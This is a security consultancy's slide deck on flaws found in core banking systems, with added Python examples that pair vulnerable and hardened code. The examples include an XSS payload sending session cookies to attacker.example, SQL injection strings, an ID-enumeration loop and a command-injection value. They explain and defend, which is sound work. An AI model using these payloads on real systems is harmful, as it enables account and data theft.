Page 1: Where the money is – Security of CBS

Where the money is. – Security of CBS.

Advisor for your information security.

Version: 1.0
Author: Ulrich Fleck
Responsible: Ulrich Fleck
Date: 27.5.2012
Confidentiality class: Public

Page 2: Where the money is – Security of CBS

© 2012 SEC Consult Unternehmensberatung GmbH – All rights reserved

Title: Where the money is – CBS Security | Version/Date: 1.0 / 27.5.2012 | Responsible: Ulrich Fleck | Confidentiality Class: Public


Agenda

• About SEC Consult

• About the study

• Threats and Drivers for Application Security in CBS

• Maturity of Application Security in CBS

• Security Crash Test of selected CBS products

• Summary

• Discussion

Page 3: Where the money is – Security of CBS


SEC Consult– Who we are

[Map: SEC Consult headquarters in Austria; SEC Consult offices in Germany, Lithuania, Singapore and Canada; other SEC Consult clients in Central and Eastern Europe]

• Leading international application security consultancy
• Founded 2002
• Headquarters near Vienna, Austria
• Delivery centers in Austria, Germany, Lithuania and Singapore
• Strong customer base in Central and Eastern Europe
• Increasing customer base of clients with global business (esp. from Top-10 US and European software vendors)
• 45+ application security experts
• Industry focus: banks, software vendors, government

Page 4: Where the money is – Security of CBS


Our Key Question

What is the promise, and what is the reality, of application security for core banking systems?

Page 5: Where the money is – Security of CBS


Part 1 – Answers provided

• We created a questionnaire with some 50 questions about security, especially with regard to core banking systems
• This questionnaire was provided to a preselected set of vendors together with the offer to participate in our study
• We recommended that the person responsible for IT security should answer, or at least quality-assure, the questions and answers
• The methodology for the survey part was based on commonly known security standards, best practices and guidelines and on the experience of Capgemini and SEC Consult

Part 2 – Security crash test at the vendor

• As the answers to the questionnaire are only a subjective picture drawn by the vendors themselves, we wanted to perform real-life security crash tests at the vendors
• Therefore we offered all vendors an application security check conducted by SEC Consult consultants
• We asked for access to the respective test system and ensured that the test results would only be published at a high level in this study, and that detailed reports about the test case results would be handed over solely to the respective vendor

Page 6: Where the money is – Security of CBS



Alternative Part 2 – Security crash tests at selected banks

• Some of the vendors were quite interested and seriously considered a "Part 2" participation; however, none finally agreed
• Therefore we had to consider an alternative solution
• Fortunately three banks, showing great interest in this study, gave us the opportunity to perform security crash tests on their systems (three CBS in the scope of this study)
• The applied methodology was based on commonly known security standards for application security, best practices for security tests with a black-box approach, and the experience of SEC Consult

Page 7: Where the money is – Security of CBS


CBS Vendors of this Study

Major vendors relevant for the international and European market.

Page 8: Where the money is – Security of CBS


Page 9: Where the money is – Security of CBS


Attack surface for core banking systems (simplified)

[Diagram: Network → Presentation Layer → Business Logic Tier → Database Layer → Databases; each tier is marked as a potential entry point for an attacker]

Page 10: Where the money is – Security of CBS


What did the vendors say?

• Information security of the vendor organization
  • Most of the vendors have an Information Security Management System (ISMS) in place
• Software development organization
  • Roles and responsibilities in the development process are documented in accordance with security policies
  • 90-100% of the (core) development staff on application security
• Methods for secure software development
  • The enforcement of methods for secure software development (Microsoft SDL, OpenSAMM, BSIMM, CMM-SSE) is in progress at some vendors
• Threat modeling and security requirements
  • Most of the vendors have an up-to-date threat model available for each CBS module

Page 11: Where the money is – Security of CBS


What did the vendors say?

• Security incident response
  • Most of the vendors have a software security incident response process
• (Technical) standards and best practices for application security
  • (Technical) application security best practices and standards for web technologies such as OWASP, ÖNORM A 7700 (Security requirements for web applications), etc. are already important for vendors
  • Data privacy standards for applications such as EuroPriSe are not in focus yet
  • No certifications conducted on application security

Page 12: Where the money is – Security of CBS


What did the vendors say about complexity?


Page 13: Where the money is – Security of CBS


What did the vendors say? – Internal QA

• Security vulnerabilities identified from 1.1.2008 to 30.6.2010 by internal QA/testers before the software was released
  • Many vendors did not provide an answer
  • Range from "none" to hundreds
• Security vulnerabilities identified from 1.1.2008 to 30.6.2010 in already released software modules ("zero-day vulnerabilities")
  • Many vendors did not provide an answer
  • Range from "none" to hundreds

Page 14: Where the money is – Security of CBS


Test coverage for application security

Significant differences in the test coverage for different test approaches between the vendors.

Page 15: Where the money is – Security of CBS


How do you define the maturity level of state-of-the-art (application) security for your CBS product?

Vendor answers (quoted):
• "Highly sophisticated"
• "Mature." (given by three vendors)
• "CMMi Level 4."
• "strong & impenetrable security foundation"
• "High"
• "30+ years with no known security issues."

All vendors position themselves as achieving (at least) state-of-the-art application security. This is a clear and consistent commitment and promise to the market.

Page 16: Where the money is – Security of CBS


Crash test for 3 CBS (out of 8)

Test set-up:
• None of the eight vendors accepted the offer of a free-of-charge security crash test
• 3 major European banks stepped in with 3 products of this study – thanks!
• Crash test with a black-box approach and a limited effort budget (approx. 15 person-days for each product)
• Access to the CBS with one low-privilege user account (standard user)

Test objectives for a crash test:
• Check for toxic (= seriously insecure) software
• Identify application security vulnerabilities in the CBS that break the confidentiality, availability or integrity of the CBS

Source: http://www.spiegel.de/fotostrecke/fotostrecke-22584-3.html

Page 17: Where the money is – Security of CBS


Why attack the CBS from a standard workplace?

[Diagram: standard workplace for the CBS (browser) → Core Banking System]

The attacker has several choices to get access to a standard workplace:
• One active Trojan horse (malware)
• Access by cleaning personnel, maintenance staff, contractors, volunteers, etc.
• Drive-by infection from website(s)
• …

Then the attacker starts to look for vulnerabilities to access the Core Banking System in depth…

For the test we used a low-privilege user and tried to expand the privileges and to access sensitive data of the Core Banking System.

Page 18: Where the money is – Security of CBS


Hundreds to thousands of CBS standard workplaces to choose from

Page 19: Where the money is – Security of CBS


Standard black-box approach

Tasks:
• Use selected special tools and scripts for exploiting security vulnerabilities, based on vulnerability classes
• Check compliance with state-of-the-art standards for application security (ÖNORM A 7700, OWASP, …)
• Adapt or write new exploit code if necessary
• Validate vulnerabilities
• Develop proof-of-concept material (screenshots, dumps, passwords, etc.)
• Assess risk and define recommendations

[Diagram: attacks from the network against Presentation Layer, Business Logic Tier, Database Layer and Database]

Page 20: Where the money is – Security of CBS


CBS – Cross-site scripting

• The problem:
  • A cross-site scripting (XSS) vulnerability is used to steal the identity information of a CBS user. First the attacker writes an email to this user with a malicious link that includes hidden script code (a very short program). The user receives the email and clicks on the link. The malicious script runs in (the context of) the web browser of the attacked user.
• Vulnerability class:
  • Web application security – input and output validation
• Impact for the bank:
  • Account theft
  • Remote control of the web browser
  • Recording of all activities of the user
  • Changes to transactions (e.g. target account numbers of a transaction swapped on the fly)

Secure software development:
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed
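The attack on this slide as an added Python example; this is not code from the study or from any tested CBS product. It assumes a hypothetical CBS search page that reflects a request parameter into its HTML, shows the page once without and once with output encoding, and carries the kind of script payload the mailed link would contain (attacker.example is a placeholder host).

```python
import html

# Constructed example, not code from the study: a page in the CBS web front
# end that reflects a user-supplied search term into the HTML response.

def render_search_vulnerable(term: str) -> str:
    """Writes the untrusted term straight into the element body, so any
    markup in it becomes part of the page the victim's browser executes."""
    return f"<h1>Results for: {term}</h1>"

def render_search_hardened(term: str) -> str:
    """Same page with output encoding: the untrusted value is HTML-entity
    encoded for the context it is written into (element body or quoted
    attribute). Values written into a <script> block, a URL or CSS need the
    encoder for that context instead; html.escape alone is not enough there."""
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"

# The "hidden script code" carried by the link in the attacker's mail. The
# script ships the victim's session cookie to the attacker's host, which is
# the "account theft" impact on the slide. attacker.example is a placeholder.
MALICIOUS_TERM = (
    "<script>document.location="
    "'http://attacker.example/?c='.concat(document.cookie)</script>"
)

def contains_unescaped_script(page: str) -> bool:
    """Check used to compare the two renderers: is a live tag in the output?"""
    return "<script>" in page

if __name__ == "__main__":
    print(render_search_vulnerable(MALICIOUS_TERM))
    print(render_search_hardened(MALICIOUS_TERM))
```

The encoding belongs at the output point, not at input validation alone: the same term may be legitimate as data (a customer called O'Brien) and only becomes dangerous when written into HTML. Marking the session cookie HttpOnly and adding a Content-Security-Policy header limit what a script that does slip through can do, but they are mitigations, not the fix.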

Page 21: Where the money is – Security of CBS


CBS – Weak encryption

• The problem:
  • First the attacker records the data traffic between the CBS client and the CBS server. Due to the weak encryption of the CBS, the attacker can bypass the login mechanism.
• Vulnerability class:
  • Design flaw in the client-server communication (the password hash is built on the client)
• Impact for the bank:
  • Account theft
  • Privilege escalation
  • Misuse of the user's account

Secure software development:
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed
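Why "hash on the client" does not protect a login, as an added Python example that is not code from the study and not the vendor's design or fix. The flawed server and the hardened one are both assumptions of this example: the first stores and compares the static hash the client sends, so one recorded login is a password-equivalent that replays; the second keeps a salted, stretched verifier on the server and demands an HMAC over a single-use nonce, so a recorded answer is worthless for the next login. User name and password are constructed demo values.

```python
from __future__ import annotations

import hashlib
import hmac
import secrets

# Constructed credentials for the demo (not from the study).
USERNAME = "teller01"
PASSWORD = "Winter2012!"
ITERATIONS = 100_000

# --- Design from the slide: the client hashes the password and sends the
# --- hash; the server stores and compares that same static value. Whoever
# --- records one login owns a password-equivalent and can replay it.

class HashOnClientServer:
    def __init__(self) -> None:
        self.store = {USERNAME: hashlib.sha256(PASSWORD.encode()).hexdigest()}

    def login(self, user: str, client_hash: str) -> bool:
        return hmac.compare_digest(self.store.get(user, ""), client_hash)

def flawed_client_message(user: str, password: str) -> tuple[str, str]:
    """The static login message the real client puts on the wire."""
    return user, hashlib.sha256(password.encode()).hexdigest()

def replay_against_flawed() -> bool:
    server = HashOnClientServer()
    captured = flawed_client_message(USERNAME, PASSWORD)  # sniffed once
    return server.login(*captured)  # replayed later: still accepted

# --- Hardened variant (an assumption for this example, not a vendor fix):
# --- salted-and-stretched verifier on the server, single-use nonce per login,
# --- the client answers with an HMAC over the nonce. The recorded answer is
# --- useless for the next login. It still belongs on top of TLS: a recorded
# --- nonce/answer pair allows offline guessing of weak passwords.

def derive_key(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

class ChallengeResponseServer:
    def __init__(self) -> None:
        self.salt = secrets.token_bytes(16)
        self.store = {USERNAME: derive_key(PASSWORD, self.salt)}
        self.pending = {}  # user -> outstanding nonce

    def challenge(self, user: str) -> tuple[bytes, bytes, int]:
        nonce = secrets.token_bytes(16)
        self.pending[user] = nonce  # replaces any older outstanding nonce
        return nonce, self.salt, ITERATIONS

    def login(self, user: str, answer: bytes) -> bool:
        nonce = self.pending.pop(user, None)  # consumed on first use
        if nonce is None or user not in self.store:
            return False
        expected = hmac.new(self.store[user], nonce, "sha256").digest()
        return hmac.compare_digest(expected, answer)

def client_answer(password: str, nonce: bytes, salt: bytes, iterations: int) -> bytes:
    """What the hardened client sends: proof of the password bound to this nonce."""
    return hmac.new(derive_key(password, salt, iterations), nonce, "sha256").digest()

def replay_against_hardened() -> tuple[bool, bool]:
    server = ChallengeResponseServer()
    answer = client_answer(PASSWORD, *server.challenge(USERNAME))
    first = server.login(USERNAME, answer)   # genuine login
    server.challenge(USERNAME)                # attacker opens a new login
    second = server.login(USERNAME, answer)   # and replays the recorded answer
    return first, second

def wrong_password_against_hardened() -> bool:
    server = ChallengeResponseServer()
    answer = client_answer("guess", *server.challenge(USERNAME))
    return server.login(USERNAME, answer)
```

The point of the slide is the design, not the hash function: replacing SHA-256 with a stronger hash on the client changes nothing, because whatever the client sends unchanged on every login is the credential. The nonce removes replay; the server-side salted KDF keeps a stolen database from being a list of usable credentials; TLS keeps the exchange off the wire in the first place. All three are needed.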

Page 22: Where the money is – Security of CBS


CBS – Privilege escalation – missing authorization

• The problem:
  • By enumerating several request parameters, arbitrary accounts can be taken over and misused by non-privileged users.
• Vulnerability class:
  • Design flaw based on missing authorization
• Impact for the bank:
  • Account theft
  • Privilege escalation
  • The attacker becomes a more powerful user
  • Access to administrative functionality
  • The attacker can misuse the CBS by performing high-privilege transactions and functions

Secure software development:
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed
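The parameter enumeration from this slide as an added Python example, not code from the study or from a tested product. It assumes a hypothetical account lookup handler behind a request such as GET /account?id=<n>: the vulnerable form authenticates the session but never ties the requested object to the caller, the hardened form adds the per-object ownership check, and an enumeration loop shows what a standard user gets from each. Accounts and users are constructed sample data.

```python
from __future__ import annotations

# Constructed sample data for this example (not data from the study): three
# accounts, and a low-privilege session user who legitimately owns only 1001.
ACCOUNTS = {
    1001: {"owner": "teller01", "balance": 1500, "role": "standard"},
    1002: {"owner": "teller02", "balance": 82000, "role": "standard"},
    1003: {"owner": "admin01", "balance": 0, "role": "administrator"},
}

class Forbidden(Exception):
    """Raised when the caller is authenticated but not authorized."""

def get_account_vulnerable(session_user: str, account_id: int) -> dict:
    """Handler for a request like GET /account?id=<n>. A valid session is
    required to reach it (authentication), but nothing ties the requested
    object to the caller (no authorization): the design flaw on the slide.
    The attacker only has to count through the id parameter."""
    return ACCOUNTS[account_id]

def get_account_hardened(session_user: str, account_id: int) -> dict:
    """Same handler with the missing check: ownership is enforced on the
    server, per object, after the lookup. 'Not found' and 'not yours' get
    the same response so enumeration does not reveal which ids exist."""
    account = ACCOUNTS.get(account_id)
    if account is None or account["owner"] != session_user:
        raise Forbidden(f"account {account_id} is not accessible")
    return account

def enumerate_parameter(handler, session_user: str, id_range) -> list[int]:
    """What the crash test did with a standard user: walk the request
    parameter and record every account the handler hands back."""
    taken_over = []
    for account_id in id_range:
        try:
            handler(session_user, account_id)
        except (KeyError, Forbidden):
            continue
        taken_over.append(account_id)
    return taken_over

def reaches_admin(handler, session_user: str, id_range) -> bool:
    """Does the low-privilege user get hold of an administrator account
    (the 'attacker becomes a more powerful user' impact on the slide)?"""
    return any(
        ACCOUNTS[i]["role"] == "administrator"
        for i in enumerate_parameter(handler, session_user, id_range)
    )
```

Sequential numeric ids make the enumeration cheap, but replacing them with random identifiers is not the fix; the check in the handler is. The failed lookups the hardened version produces are also worth logging: a single session raising hundreds of Forbidden responses across consecutive ids is exactly the pattern the crash test generated.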

Page 23: Where the money is – Security of CBS


CBS – SQL injection

• The problem:
  • Nothing to add here; this should be an extinct vulnerability class.
• Vulnerability class:
  • Web application security – input validation & design flaw
• Impact for the bank:
  • Extraction of valuable data from the database (data theft)
  • Manipulation of data in the database
  • Account theft
  • Privilege escalation

Secure software development:
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed
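An added Python example for this slide, not code from the study or from a tested CBS: a hypothetical customer search against an in-memory SQLite table with constructed sample rows, once with the filter value pasted into the statement and once parameterized, run against a tautology payload and a UNION payload that pulls the schema out of the database.

```python
from __future__ import annotations

import sqlite3

def open_demo_db() -> sqlite3.Connection:
    """Constructed in-memory customer table (not data from the study)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER, name TEXT, iban TEXT, branch TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?, ?)",
        [
            (1, "A. Example", "AT00 1111 1111 1111 1111", "vienna"),
            (2, "B. Example", "AT00 2222 2222 2222 2222", "vienna"),
            (3, "C. Example", "AT00 3333 3333 3333 3333", "graz"),
        ],
    )
    return conn

def customers_by_branch_vulnerable(conn, branch: str) -> list[tuple]:
    """The branch filter comes from a request parameter and is pasted into
    the statement text, so the value can become SQL syntax."""
    sql = f"SELECT id, name, iban FROM customers WHERE branch = '{branch}'"
    return conn.execute(sql).fetchall()

def customers_by_branch_hardened(conn, branch: str) -> list[tuple]:
    """Parameterized statement: the driver sends the value separately from
    the statement, so quotes and keywords in it stay data."""
    sql = "SELECT id, name, iban FROM customers WHERE branch = ?"
    return conn.execute(sql, (branch,)).fetchall()

# Two payloads a tester sends in the 'branch' parameter.
# Tautology: the WHERE clause becomes always true, every customer row leaks.
TAUTOLOGY = "x' OR '1'='1"
# UNION: append the schema to the result set. Three columns to match the
# original SELECT; '--' comments out the closing quote of the original.
UNION_SCHEMA = "x' UNION SELECT 0, name, sql FROM sqlite_master --"

def run_demo() -> dict:
    """Both handlers against a legitimate value and both payloads."""
    conn = open_demo_db()
    return {
        "legit": customers_by_branch_vulnerable(conn, "vienna"),
        "tautology_vulnerable": customers_by_branch_vulnerable(conn, TAUTOLOGY),
        "tautology_hardened": customers_by_branch_hardened(conn, TAUTOLOGY),
        "union_vulnerable": customers_by_branch_vulnerable(conn, UNION_SCHEMA),
        "union_hardened": customers_by_branch_hardened(conn, UNION_SCHEMA),
    }

if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(label, rows)
```

The UNION payload is the one that matters for the "data theft" impact: once the schema is readable the same technique walks every table, and in a CBS that includes the tables the low-privilege user was never meant to see. Escaping quotes by hand is the historical mistake that keeps this class alive; parameterization at every statement is the fix.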

Page 24: Where the money is – Security of CBS


CBS – Direct OS command execution

• The problem:
  • Several flaws led to access to the underlying operating system for non-privileged users.
• Vulnerability class:
  • Web application security – input validation & design flaw
• Impact for the bank:
  • Control over the operating system of the CBS server
  • The CBS can be shut down, wiped or manipulated with wrong data by the attacker
  • Data of the server can be copied to a repository of the attacker
  • Additionally, this vulnerability can be used to attack other systems of the bank
  • Account theft and privilege escalation
  • Total compromise of the system, data back ends, etc.

Secure software development:
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed
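One of the ways a web application hands the operating system to its users, as an added Python example that is not code from the study or from a tested CBS. It assumes a hypothetical report export that builds a shell command from a user-controlled file name; "echo" stands in for the real converter so the example runs on any system with a POSIX /bin/sh. The hardened form validates the name against an allow-list and passes it as a single argv element with no shell in between.

```python
import re
import subprocess

# Constructed scenario (not code from the study): a CBS export function that
# builds a shell command from a user-controlled report name. "echo" stands in
# for the real converter so the example runs anywhere with a POSIX /bin/sh.

def export_report_vulnerable(report_name: str) -> str:
    """String concatenation plus shell=True: the parameter is parsed by the
    shell, so metacharacters in it (; | & ` $( )) run as further commands
    with the privileges of the application server."""
    command = f"echo exporting {report_name}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout

# Allow-list for the parameter: letters, digits, '_' and '-', one of two
# extensions, and no leading '-' so the value can never be read as an option.
REPORT_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_-]{0,63}\.(pdf|csv)$")

def export_report_hardened(report_name: str) -> str:
    """Validate against the allow-list, then pass the value as one argv
    element without a shell. The name reaches the program as data only."""
    if not REPORT_NAME.fullmatch(report_name):
        raise ValueError(f"rejected report name: {report_name!r}")
    result = subprocess.run(
        ["echo", "exporting", report_name], capture_output=True, text=True
    )
    return result.stdout

# The payload a low-privilege user submits in the report-name field. The
# second command is a harmless marker here; in the crash test it would be
# whatever gives a shell on the CBS server.
INJECTED = "q1.pdf; echo INJECTED"

def injection_succeeds(handler) -> bool:
    """True if the second command in INJECTED ran (its output is present)."""
    try:
        return "INJECTED\n" in handler(INJECTED)
    except ValueError:
        return False

if __name__ == "__main__":
    print(export_report_vulnerable(INJECTED), end="")
    print(injection_succeeds(export_report_hardened))
```

Dropping the shell is the part that removes the vulnerability class; the allow-list is there because the called program has its own parser (options, paths outside the export directory) that the argv boundary does not protect against. Running the application server as a dedicated low-privilege OS user, as the slide's impact list implies, limits what a successful injection can reach but does not prevent it.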

Page 25: Where the money is – Security of CBS


Summarizing

3 of 3 tested CBS fail application security standards:
• e.g. Open Web Application Security Project (OWASP), WASC, BSI ISi-Reihe (Germany), ÖNORM A 7700 (Austria), etc.

3 of 3 tested CBS are not state of the art in application security

3 of 3 tested CBS have deficiencies in secure software development
• Architecture/Design: Failed
• Programming: Failed
• Test and Quality Assurance: Failed

[Figure: the vendors' self-assessments from the questionnaire ("Mature.", "CMMi Level 4.", "High") stamped with the crash test verdict: FAILED! FAILED! FAILED!]

Page 26: Where the money is – Security of CBS


Business Impact for Banks

• The vulnerabilities found in 3 of 3 tested CBS
  • enable unauthorized access
  • disable segregation of duties
  • circumvent the effectiveness of auditing and logging
  • circumvent the effectiveness of strict access control and enable privilege escalation
  and can therefore cause violations of compliance requirements such as Basel II, SAS 70, ISO 27001, national data privacy protection laws, national banking-specific laws, etc.

[Diagram: attacks from the network against Presentation Layer, Business Logic Tier, Database Layer and Database]

Page 27: Where the money is – Security of CBS


What to do if you are a bank?

Demand state-of-the-art application security for the CBS
• Vendor contracts with mandatory state-of-the-art application security requirements
• Define penalties for not achieving the state-of-the-art application security requirements
• Cost sharing for unsuccessful application security tests

Prove the vendor claims and promises by testing the application security of the CBS
• Application security tests (security quality gates)

Establish additional multiple lines of defense
• Measures to at least temporarily mitigate some risks of an insecure CBS on other levels of defense (infrastructure, organizational, awareness of users, etc.)

The best point in time to detect toxic (= seriously insecure) software is when you buy it.

Page 28: Where the money is – Security of CBS

© 2011 SEC Consult Unternehmensberatung GmbH – All rights reserved

Title: SEC Consult Software Security Assurance Services | Version/Date: 1.1 / May 2011 | Responsible: U. Fleck | Confidentiality Class: Public

Software Vendors already using SEC Consult.

Page 29: Where the money is – Security of CBS



How to reach us/me?

SEC Consult Unternehmensberatung GmbH
Mooslackengasse 17
A-1190 Vienna
Austria
Tel: +43-(0)1-890 30 43-0
Fax: +43-(0)1-890 30 43-15
Email: [email protected]

Ulrich Fleck
Director Sales and Business Development
+43 676 840 301 719
Email: [email protected]